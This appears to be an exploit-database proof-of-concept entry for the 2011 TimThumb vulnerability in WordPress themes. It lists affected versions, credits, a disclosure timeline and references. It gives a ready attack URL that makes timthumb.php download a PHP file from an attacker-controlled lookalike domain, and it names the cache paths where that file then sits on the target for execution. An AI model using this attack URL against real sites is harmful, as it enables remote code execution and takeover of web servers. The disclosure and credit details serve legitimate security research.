Versions Affected:
1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
(Version 1.33 did not save the cache file as .php)
External Links:
http://www.binarymoon.co.uk/projects/timthumb/
http://code.google.com/p/timthumb/
Credits:
- Mark Maunder (Original Researcher)
- MaXe (Indepedendent Proof of Concept Writer)
Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.)
http://www.target.tld/wp-content/themes/THEME/timthumb.php?
src=http://blogger.com.evildomain.tld/pocfile.php
Stored file on the Target: (This can change from host to host.)
1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.
NOTE: This file is often renamed and you should therefore issue
a command like this in a terminal: (Thanks to rAWjAW for this info.)
find . | grep php | xargs grep -s timthumb
Disclosure Information:
- Vulnerability Disclosed (Mark Maunder): 1st August 2011
- Vulnerability Researched (MaXe): 2nd August 2011
- Disclosed at The Exploit Database: 3rd August 2011
References:
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-
timthumb-php-hack/
http://code.google.com/p/timthumb/issues/detail?id=212
http://programming.arantius.com/the+smallest+possible+gif